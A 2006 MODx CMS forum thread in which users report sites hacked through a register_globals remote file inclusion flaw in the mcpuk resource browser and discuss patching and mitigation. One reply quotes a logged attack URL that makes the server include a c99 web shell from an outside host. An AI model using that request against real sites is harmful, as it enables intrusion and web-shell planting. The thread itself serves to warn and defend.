davidm
MODx evangelist
Marketing & Design Team
Posts: 7,026
Software is like sex, it's better when it's free !
|
 |
« on: Nov 03, 2006, 02:18 PM » |
|
Admin Note: This is in reference to http://modxcms.com/forums/index.php/topic,8604Now that was a quick fix ! I am putting a sticky in the french boards about this. I think we should notify all moderators to do the same. Not everyone read the english boards  Off to appying the patch on my installs... Edit : DONE. Duh, not needed I have register_globals OFF... Anyway, thanks to Aour for reporting this on the original thread 
|
|
|
|
« Last Edit: Nov 06, 2006, 10:35 AM by rthrash »
|
Logged
|
|
|
|
nzkiwi
Jr. Member
Posts: 28
|
|
« Reply #1 on: Nov 04, 2006, 04:35 AM » |
|
I found this thread too late. My client's site has just been hacked by taking advantage of this flaw. The hacker used the flaw to modify config.inc.php. On checking zone-h.org, I see he has got to quite a number of other MODx sites during the last 24 hours. I'm trying to persuade my client's host to have register_globals set to off....
|
|
|
|
|
Logged
|
|
|
|
Commodore64
Moderators
Posts: 93
|
|
« Reply #2 on: Nov 04, 2006, 04:59 AM » |
|
The hacker tried to hack my site! I found the following access on my stats: http : //www.roma21.it/ index.php?page=manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://hackeramca.tripod.com/c99shell.txt? Some information about the hacker: Windows XP Firefox 2.0 1024x768 32 bit 88.224.109.151 Referer: Google (Turkey), Query: "powered by MODx" Apart from this, yesterday I had a HUGE number of accesses coming from Google query "Powered by MODx"; many of them came from Turkey, but also Egipt, Morocco, Pakistan, China, France, Germany, etc.; that's weird, I don't know if Google suddenly increased my PageRank or there are lots of hackers around the net  Edit: My register_globals variable is set to ON. I wonder why the attack wasn't successful... or perhaps my system has been already infected? What can I do in this case? |
|
|
|
« Last Edit: Nov 04, 2006, 05:03 AM by Commodore64 »
|
Logged
|
|
|
|
davidm
MODx evangelist
Marketing & Design Team
Posts: 7,026
Software is like sex, it's better when it's free !
|
|
« Reply #3 on: Nov 04, 2006, 05:04 AM » |
|
Yeah of course you did, that's how they spot that you're using MODx... I don't know if the fact I have the "powered by" translated in french but I didn 't get hit...
|
|
|
|
|
Logged
|
|
|
|
nzkiwi
Jr. Member
Posts: 28
|
|
« Reply #4 on: Nov 04, 2006, 06:36 AM » |
|
In the past, I had removed any reference to the CMS being used. Recently I have been putting a simple "Powered by MODx" in the footer of MODx sites in recognition of the advantages MODx provides me. This hack has given me cause to reflect on whether I have done the right thing by including the "powered by..." message
My concern has always been that a site becomes more vulnerable if it becomes known what scripts are being run on a site - the reason I removed all references in the first place. MODx does a good job of not revealing its identity in the code it outputs (unlike some other CMSs). The exception is that it seems to be the only CMS that uses "/manager" as its admin directory. Ideally we should be able to choose a unique name at time of installation to make the lives of hackers just that much more difficult.
|
|
|
|
|
Logged
|
|
|
|
nzkiwi
Jr. Member
Posts: 28
|
|
« Reply #5 on: Nov 04, 2006, 07:02 AM » |
|
My register_globals variable is set to ON. I wonder why the attack wasn't successful... or perhaps my system has been already infected? What can I do in this case? Although the site was running fine until about 12 hours ago, installing a backup from 30-Oct did not fix the problem. We has to go back to prior to 28-Oct to get up and running again. Once we discovered that the only file affected was config.inc.php, we restored to yesterday's backup and then restored config.inc.php from 27-Oct. I'd like the host provider to provide me with before & after versions of the file, as there may be some date triggerred trojan lurking in there. As a precaution, it might not hurt to check out that file. |
|
|
|
|
Logged
|
|
|
|
|
yentsun
|
|
« Reply #6 on: Nov 04, 2006, 08:34 AM » |
|
Ive been hacked also.... the sucker left a message: " rtendo@sbcglobal.net was here" |
|
|
|
|
Logged
|
|
|
|
Jesse R.
Coding Team
Posts: 785
|
|
« Reply #7 on: Nov 04, 2006, 10:29 AM » |
|
Well another way to give credit to MODx without having the text is to use an IMG with no ALT tag. I think there are images floating around the forum to that effect.
|
|
|
|
|
Logged
|
Jesse R. Consider trying something new and extraordinary. Illinois WineHave you considered donating to MODx lately? Donate now. Every contribution helps. |
|
|
|
identity
|
|
« Reply #8 on: Nov 04, 2006, 10:49 AM » |
|
It's unfortunate, but the reality has become that you take a big risk providing critical information publicly like that about the scripts you use. In some ways, when an exploit is found, you may be doing more harm than good to the reputation of the script. Forum makers are in some ways, their worst enemies... most require a credit and a link back to their sites, which means as soon as an exploit gets discovered, the hackers can turn to the search engines and get a list of potential targets in seconds. It would seem that hackers have become highly efficient... specializing in going after certain scripts or using certain exploits to increase their "success" rate and hit as many targets in as short a period of time.  Too bad all that intelligence can be put to some better use. |
|
|
|
|
Logged
|
|
|
|
sottwell
Documentation Team
Posts: 8,837
|
|
« Reply #9 on: Nov 04, 2006, 11:03 AM » |
|
Well, now with the new Google code search, it may be possible for them to find any site with that vulnerability.
|
|
|
|
|
Logged
|
|
|
|
straty
Full Member
Posts: 136
Laugh now but one day ModX will be in charge
|
|
« Reply #10 on: Nov 04, 2006, 11:06 AM » |
|
Thanks for the heads up, I just checked and thankfully i have globals off.
|
|
|
|
|
Logged
|
|
|
|
sottwell
Documentation Team
Posts: 8,837
|
|
« Reply #11 on: Nov 04, 2006, 11:11 AM » |
|
Globals off, php running suExec so I don't have to have anything at all with world-writable permissions were things I looked for in hosting.
|
|
|
|
|
Logged
|
|
|
|
OpenGeek
MODx Co-Founder
Foundation
Posts: 5,813
damn accurate caricatures...
|
|
« Reply #12 on: Nov 04, 2006, 11:26 AM » |
|
Just another reminder, my personal sites were hit with over 200 attempts to exploit this vulnerability in the last 24 hrs and they are still at it; luckily I help run my own server and we configured the box with register globals = off, so not a one of the attempts has been or will be successful.
Regardless, I want to reiterate how critical it is that you patch or remove the mcpuk resource browser if you have register_globals=On; I personally would remove it completely for now unless you specifically need it for the sites' editors to use. If you do remove it, don't forget to disable the resource browser in your configuration, so the FCKEditor or TinyMCE can still be used despite the lack of the resource browser.
If you have been hit already, it's best to clean out the entire file system in your account and load clean files back in. That or you are going to need to search through the file system very thoroughly to make sure there are not any files left by the intruder that may cause further damage in the future, or allow further exploits to occur.
Finally, after initial reviews of all the various security exploits involving FredCKEditor, I'm simply uncertain whether additional unidentified vulnerabilities exist in the mcpuk resource browser code currently integrated into MODx, and considering the nature of the exploit, I wouldn't take any chances until we announce an official new release of the/a resource browser, especially if you are unsure whether your server is properly secured against these types of attacks.
|
|
|
|
|
Logged
|
Jason Coward
MODx Co-Founder
xPDO Founder
CTO @ Collabpad
work productively.
work intelligently.
work together.
Light is just a vibration of a note too. Everything is. You've got to keep that in mind.
Frank Zappa
|
|
|
davidm
MODx evangelist
Marketing & Design Team
Posts: 7,026
Software is like sex, it's better when it's free !
|
|
« Reply #13 on: Nov 04, 2006, 01:21 PM » |
|
I have several french users reporting they failed to see the announcement in time to avoid being hacked (note that I posted a sticky in the french Announcement board, with a how to check their register_global settings). I have been repeatedly asked that we send out a message via the SMF messaging system for example. I am not sure this is the way to go and will ask that they subscribe to the Annoucement forum instead.
Maybe a dedicated Security board to which users could subscribe would be even easier. Not sure which way is the best, but I am here so often I don't have the same perspective the average user will have.
|
|
|
|
|
Logged
|
|
|
|
|
OncleBen31
|
|
« Reply #14 on: Nov 04, 2006, 01:33 PM » |
|
I've add the feature request FS#653 to ask a box in the manager to display announcement of the official MODx site like in admin page of SMF. This feature will permit to transmit security warning quicker than an announcement in the forum |
|
|
|
|
Logged
|
|
|
|
|
